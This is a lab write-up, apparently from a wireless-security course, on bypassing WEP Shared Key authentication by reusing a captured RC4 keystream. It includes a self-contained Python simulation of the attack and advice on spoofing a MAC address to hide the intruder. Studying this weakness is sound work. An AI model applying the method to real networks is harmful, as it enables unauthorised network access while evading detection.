3.2 - Bypassing WEP Shared Key Authentication
- Unlike the previous practice's attack, the goal here is to bypass WEP Shared Key authentication directly, without ever recovering the Shared Key: the attacker authenticates and associates with the AP, and does so from a spoofed MAC address.
- This is a cheaper attack than the previous one, because it targets the authentication handshake rather than the encryption key: a single captured handshake is enough, and far fewer frames and less processing are needed than in the previous practice.
- In this case, the AP is configured with WEP (64-bit) encryption and Shared Key authentication:
- From the attacker "kali"'s command shell, the legitimate client "roch"'s connection is detected:
- Either by deauthenticating the legitimate client "roch" or by waiting for it to reconnect, the Shared Key authentication exchange between the AP and "roch" is captured by airodump-ng and stored under the file prefix sharedkeyWEP:
- The file sharedkeyWEP and its derivatives are created, but the one of interest for this practice is sharedkeyWEP-01-00-25-F2-9B-91-23.xor: airodump-ng recovers the RC4 keystream by XORing the cleartext challenge (authentication frame 2) with the encrypted response (frame 3), and saves that keystream together with the IV it belongs to:
- Now, aireplay-ng is used quite differently from before:
a) first, the fake-authentication attack (-1) is given the keystream file (-y), so the injected response to the AP's challenge is encrypted with the same IV and keystream that "roch" used to authenticate; the AP decrypts it, the ICV checks out and the challenge matches, so the response is accepted without the key ever being used.
b) second, "kali" supplies a fake source MAC address (-h), such as AA:AA:AA:AA:AA:AA, to cover the tracks of the attack.
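To make the mechanism behind those two steps concrete, here is an added simulation, written for this edit and not part of the original practice or of the aircrack-ng suite, of the three roles in the attack: the AP running Shared Key authentication, the eavesdropper deriving the keystream the way airodump-ng does into the .xor file, and the attacker answering a fresh challenge with that keystream the way aireplay-ng -1 -y does. The WEP key, the station names and the assumed .xor layout (3-byte IV, 1-byte key index, then the keystream) are constructed for the example.

```python
"""Constructed simulation of WEP Shared Key authentication and its keystream-reuse bypass."""
import os
import struct
import zlib

WEP_KEY = bytes.fromhex("0102030405")  # constructed 40-bit key (WEP-64); the attacker never sees it
KEY_INDEX = 0                          # key slot number carried after the IV in every WEP frame


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 as WEP uses it: KSA over (IV || key), PRGA XORed onto data (encrypt == decrypt)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(c ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(data: bytes) -> bytes:
    """WEP integrity check value: little-endian CRC-32 of the plaintext, encrypted along with it."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def auth_body(challenge: bytes) -> bytes:
    """Plaintext of authentication frame 3: algorithm=1 (Shared Key), seq=3, status=0,
    followed by the challenge-text information element (tag 0x10, length 128)."""
    return struct.pack("<HHH", 1, 3, 0) + bytes([0x10, len(challenge)]) + challenge


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_seal(key: bytes, iv: bytes, body: bytes) -> bytes:
    """What goes on the air: IV || key index || RC4(IV||key, body || ICV)."""
    return iv + bytes([KEY_INDEX]) + rc4(iv + key, body + icv(body))


def wep_open(key: bytes, payload: bytes):
    """AP side: decrypt with the IV taken from the frame and check the ICV; None on failure."""
    plain = rc4(payload[:3] + key, payload[4:])
    body, tag = plain[:-4], plain[-4:]
    return body if icv(body) == tag else None


class AccessPoint:
    """Shared Key authenticator: sends a random 128-byte challenge in the clear (frame 2)
    and accepts the station if frame 3 decrypts to that challenge with a valid ICV."""
    def __init__(self, key: bytes):
        self._key, self._pending = key, {}

    def challenge(self, sta: str) -> bytes:
        self._pending[sta] = os.urandom(128)
        return self._pending[sta]

    def verify(self, sta: str, payload: bytes) -> bool:
        body = wep_open(self._key, payload)
        return body is not None and body == auth_body(self._pending.pop(sta, b""))


def recover_keystream(challenge: bytes, payload: bytes) -> bytes:
    """Eavesdropper (what airodump-ng stores in the .xor file): cleartext of frame 2 XOR
    ciphertext of frame 3 is the PRGA for that IV. Assumed layout: IV, key index, keystream."""
    plain = auth_body(challenge)
    return payload[:4] + xor(payload[4:], plain + icv(plain))


def forge_response(xor_file: bytes, challenge: bytes) -> bytes:
    """Attacker (aireplay-ng -1 with -y): reuse the captured IV and keystream to encrypt a
    fresh challenge without knowing the key."""
    plain = auth_body(challenge)
    plain += icv(plain)
    iv_hdr, ks = xor_file[:4], xor_file[4:]
    if len(plain) > len(ks):
        raise ValueError("captured keystream is too short for this challenge")
    return iv_hdr + xor(plain, ks[:len(plain)])


def run_attack() -> dict:
    ap = AccessPoint(WEP_KEY)
    # 1. The legitimate client "roch" authenticates; the sniffer sees frames 2 and 3.
    chal = ap.challenge("roch")
    resp = wep_seal(WEP_KEY, os.urandom(3), auth_body(chal))
    legit_ok = ap.verify("roch", resp)
    # 2. The eavesdropper derives IV + keystream from that single exchange.
    xor_file = recover_keystream(chal, resp)
    # 3. "kali", from a spoofed MAC, answers a brand-new challenge using only the keystream.
    fake = "AA:AA:AA:AA:AA:AA"
    forged_ok = ap.verify(fake, forge_response(xor_file, ap.challenge(fake)))
    # 4. Control: answering with a guessed (constructed, wrong) key is rejected by the ICV check.
    blind_ok = ap.verify("guess", wep_seal(b"\x00" * 5, xor_file[:3], auth_body(ap.challenge("guess"))))
    return {"legit_ok": legit_ok, "keystream_len": len(xor_file) - 4,
            "forged_ok": forged_ok, "blind_ok": blind_ok}


if __name__ == "__main__":
    print(run_attack())
```

Running it reports legit_ok and forged_ok as True and blind_ok as False: the AP cannot tell the forged response from a genuine one, because the only thing its check exercises (decrypt, verify the ICV, compare the challenge) is the keystream for that IV, and the handshake itself leaked it. The recovered keystream is 140 bytes and tied to one IV, which is exactly what an authentication frame needs; that is why the attack is so much cheaper than recovering the key.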
- Now it can be verified that "kali" has successfully joined the network "spaniard":
- It even receives an IP address through DHCP:
- "kali" is now part of the network "spaniard" and can ping the default gateway 102.168.0.1:
- "kali" also has Internet access through the AP's external interface, as shown by pinging Google's public DNS:
- airodump-ng detects both clients, the legitimate "roch" and the attacker "kali", connected to the "spaniard" network:
- The AP also shows both clients connected, which is funny because "kali" appears with the obviously fake MAC address AA:AA:AA:AA:AA:AA.
- Of course, in a real attack, "kali" would have chosen a less conspicuous MAC address than AA:AA:AA:AA:AA:AA.
- In conclusion, the attacker "kali" has been able to join the network directly, bypassing WEP Shared Key authentication without going through the steps of recovering the encryption key, and spoofing its own MAC address to cover the attack. The weakness exploited is that Shared Key authentication hands an eavesdropper a plaintext/ciphertext pair, and WEP happily accepts a reused IV, so the keystream from one observed handshake is valid for any future challenge.